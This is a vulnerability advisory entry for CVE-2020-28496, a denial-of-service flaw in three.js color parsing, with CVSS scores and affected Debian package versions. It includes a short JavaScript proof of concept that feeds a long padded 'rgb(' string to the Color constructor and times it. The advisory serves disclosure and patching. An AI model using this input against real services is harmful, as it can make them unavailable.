CVE-2020-28496

2021-02-1815:15:13

Debian Security Bug Tracker

security-tracker.debian.org

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

0.003 Low

EPSS

Percentile

70.5%

JSON

This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require(‘three’) function build_blank (n) { var ret = “rgb(” for (var i = 0; i < n; i++) { ret += " " } return ret + “”; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")

OSVersionArchitecturePackageVersionFilename
Debian12allthree.js< 111+dfsg1-3three.js_111+dfsg1-3_all.deb
Debian11allthree.js< 111+dfsg1-2three.js_111+dfsg1-2_all.deb
Debian999allthree.js< 111+dfsg1-3three.js_111+dfsg1-3_all.deb
Debian13allthree.js< 111+dfsg1-3three.js_111+dfsg1-3_all.deb

OS	Version	Architecture	Package	Version	Filename
Debian	12	all	three.js	< 111+dfsg1-3	three.js_111+dfsg1-3_all.deb
Debian	11	all	three.js	< 111+dfsg1-2	three.js_111+dfsg1-2_all.deb
Debian	999	all	three.js	< 111+dfsg1-3	three.js_111+dfsg1-3_all.deb
Debian	13	all	three.js	< 111+dfsg1-3	three.js_111+dfsg1-3_all.deb